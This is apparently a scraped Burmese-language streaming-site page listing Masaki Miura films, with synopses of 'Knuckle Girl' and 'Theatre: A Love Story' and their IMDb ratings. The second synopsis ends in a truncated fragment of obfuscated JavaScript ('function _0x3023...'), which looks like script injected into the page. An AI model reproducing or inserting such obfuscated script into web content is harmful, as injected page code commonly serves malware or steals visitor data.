Alpha Premium

Masaki Miura

Knuckle Girl (2023) N/A
Knuckle Girl (2023) ##unicode အက်ရှင်ခန်းများများနဲ့ ဇာတ်လမ်းခပ်ကြမ်းကြမ်း ကြည့်ရတာကြိုက်တဲ့သူတွေအတွက် "Knuckle Girl" ဆိုတဲ့ဂျပန်ကားလေးကို တင်ဆက်ပေးလိုက်ပါတယ် ဒီကားထဲမှာတော့ ရန်နဲ့ ယူဇူကီတို့ညီအစ်မနှစ်ယောက်ဟာ မိဘတွေမရှိတော့ဘဲ ဘဝကိုရုန်းကန်နေကြရတဲ့သူတွေ ဖြစ်ပါတယ် ရန်ဟာ အရင်ကတော့ ဒုစရိုက်အလုပ်တွေ လုပ်ခဲ့ဖူးပေမယ့် ညီမဖြစ်သူရဲ့စကားကြောင့် လက်ဝှေ့လောကထဲကိုဝင်လာခဲ့တာပါ ဒါပေမယ့် တစ်နေ့မှာတော့ ရဲတွေက ရန့်ရဲ့ညီမဟာ ကားမီးလောင်မှုထဲမှာသေဆုံးသွားတယ်လို့ အကြောင်းကြားလာခဲ့ပါတယ် ရန်ဟာသူ့ညီမအလောင်းလို့ ရဲတွေယူဆထားတဲ့အလောင်းကို ကြည့်တဲ့အချိန် သူ့ညီမမဟုတ်ဘူးဆိုတာ သိသွားခဲ့ပါတယ် ဒီလိုနဲ့ ထူးဆန်းစွာနဲ့ပျောက်ဆုံးသွားတဲ့သူ့ညီမကို ရှာဖွေဖို့အတွက်ဖြစ်လာခဲ့တာပေါ့ ဒါပေမယ့် သူ့ညီမပျောက်ဆုံးမှုမှာ အရမ်းကိုရက်စက်တဲ့လူမိုက်ဂိုဏ်းကြီးတစ်ခုက နောက်ကွယ်ကနေ ကြိုးကိုင်နေတယ်ဆိုတာသိလိုက်ရတဲ့အခါမှာတော့.. ရန်တစ်ယောက် သူ့ညီမကို ဘေးကင်းကင်းနဲ့ အိမ်ကိုပြန်ခေါ်လာနိုင်မှာလား၊ သူ့ညီမပျောက်ဆုံးမှုနောက်ကွယ်က အရှုပ်ထွေးတွေက ဘယ်လိုရှိနေဦးမလဲဆိုတာကိုတော့ ဇာတ်လမ်းထဲမှာ ဆက်လက်စောင့်ကြည့်ပေးကြပါဦးနော် ##zawgyi အက်ရှင်ခန်းများများနဲ့ ဇာတ်လမ်းခပ်ကြမ်းကြမ်း ကြည့်ရတာကြိုက်တဲ့သူတွေအတွက် "Knuckle Girl" ဆိုတဲ့ဂျပန်ကားလေးကို တင်ဆက်ပေးလိုက်ပါတယ် ဒီကားထဲမှာတော့ ရန်နဲ့ ယူဇူကီတို့ညီအစ်မနှစ်ယောက်ဟာ မိဘတွေမရှိတော့ဘဲ ဘဝကိုရုန်းကန်နေကြရတဲ့သူတွေ ဖြစ်ပါတယ် ရန်ဟာ အရင်ကတော့ ဒုစရိုက်အလုပ်တွေ လုပ်ခဲ့ဖူးပေမယ့် ညီမဖြစ်သူရဲ့စကားကြောင့် လက်ဝှေ့လောကထဲကိုဝင်လာခဲ့တာပါ ဒါပေမယ့် တစ်နေ့မှာတော့ ရဲတွေက ရန့်ရဲ့ညီမဟာ ကားမီးလောင်မှုထဲမှာသေဆုံးသွားတယ်လို့ ...
N/A
IMDB: N/A/10 22 votes
movie

Knuckle Girl (2023)

2023
Theatre: A Love Story 5.3
Theatre: A Love Story ဒီတခါတော့ ၂၀၂၀ထွက် ဂျပန်romance/dramaဇာတ်လမ်းလေး တင်ဆက်ပေးလိုက်ပါတယ်. တကယ်ကို ရင်ထဲမှာ ခံစားသွားရစေမယ့် အချစ်ဇာတ်လမ်းလေးတပုဒ်ဆိုလဲ မမှားပါဘူး. ဇာတ်လမ်းအကျဉ်းလေးကတော့ Nagataဟာ သိပ်ကို အနုပညာဘက်မှာ ထူးချွန်ချင်တဲ့ လူတစ်ယောက်ပါ. သူဟာ ပြဇာတ်တွေအတွက် ဇာတ်ညွှန်းရေးတဲ့ စာရေးဆရာဖြစ်ပြီး အဲ့ဒီအလုပ်ကလွဲရင် တခြားဘယ်အလုပ်ကိုမှ မလုပ်ချင်တဲ့ခေါင်းမာတက်တဲ့ လူလဲဖြစ်ပါတယ်. တနေ့မှာတော့ သူ့ဘဝထဲကို သိပ်ကိုဖြူစင်ပြီး လှပတဲ့ နတ်သမီးလေး Sakiဝင်ရောက်လာခဲ့ပါတယ်. Nagataဟာ ပြဇာတ်တွေရေးရတာကို ဝါသနာပါပေမယ့် ပါရမီတော့ မပါခဲ့ပါဘူး. ဒီတော့ လူတွေရဲ့ ဝေဖန်မှုတွေကို ခံခဲ့ရပြီး သူ့အဖွဲ့ဟာလဲ ပျက်သွားခဲ့ပါတယ်. အဲ့ဒီအချိန်မှာ Sakiကို သူက သရုပ်ဆောင်ခိုင်းကြည့်ခဲ့ပါတယ်, သွက်သွက်လက်လက်နဲ့ ပါရမီရှိတဲ့ Sakiလေးပါတော့ ပရိတ်သတ်တော်တော်များများက သဘောကျကျပြီး သူ့ဇာတ်လမ်းလဲ ပေါက်သွားခဲ့ပါတယ်. ဒါပေမယ့် သူကတော့ နောက်ပြဇာတ်တွေမှာ Sakiကိုထပ်မသုံးတော့ပါဘူး ဘာလို့လဲဆိုတော့ သူ့ကောင်မလေးဖြစ်တဲ့ Sakiကပါရမီရှိတာသိသာလေလေ သူကအရှုံးသမားဆိုတာ ပိုပြီးသိသာလာလေလေလို့ သူတွေးမိခဲ့လို့ပါပဲ. အပြစ်ကင်းတဲ့ Sakiလေးကတော့ ဒါတွေကို နားမလည်ခဲ့ပါဘူး. သူတို့နေတဲ့ တိုက်ခန်းခတွေ အသုံးစရိတ်တွေကို ပေးနိုင်ဖို့ အလုပ်ကိုနေ့ရောညရော လုပ်နေခဲ့ပါတယ်. Sakiက ပိုပြီးဖြူစင်တာကို သိလာလေလေ Nagataဟာ ပိုပြီး အပြစ်ရှိခံစားစိတ်ဖြစ်လာလေလေပါပဲ. သူတို့နှစ်ဦးရဲ့ဇာတ်သိမ်းက ဘယ်လိုများဖြစ်မလဲ? Sakiနဲ့Nagataပေါင်းဖက်နိုင်ရဲ့လားဆိုတာကို ဇာတ်သိမ်းပိုင်းထိ ဆွဲဆောင်နိုင်ပြီး ရင်ထဲမှာ ခံစားချက်တစ်ခု ထည့်ပေးနိုင်တဲ့ ဂျပန်ဒရာမာ ဇာတ်လမ်းလေးဖို့ ကြည့်ဖို့ တင်ဆက်ပေးလိုက်ပါတယ်ဗျာ. function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return ...
5.3
IMDB: 5.3/10 73 votes
movie

Theatre: A Love Story

2020
Premium

Release year

Genres

Release year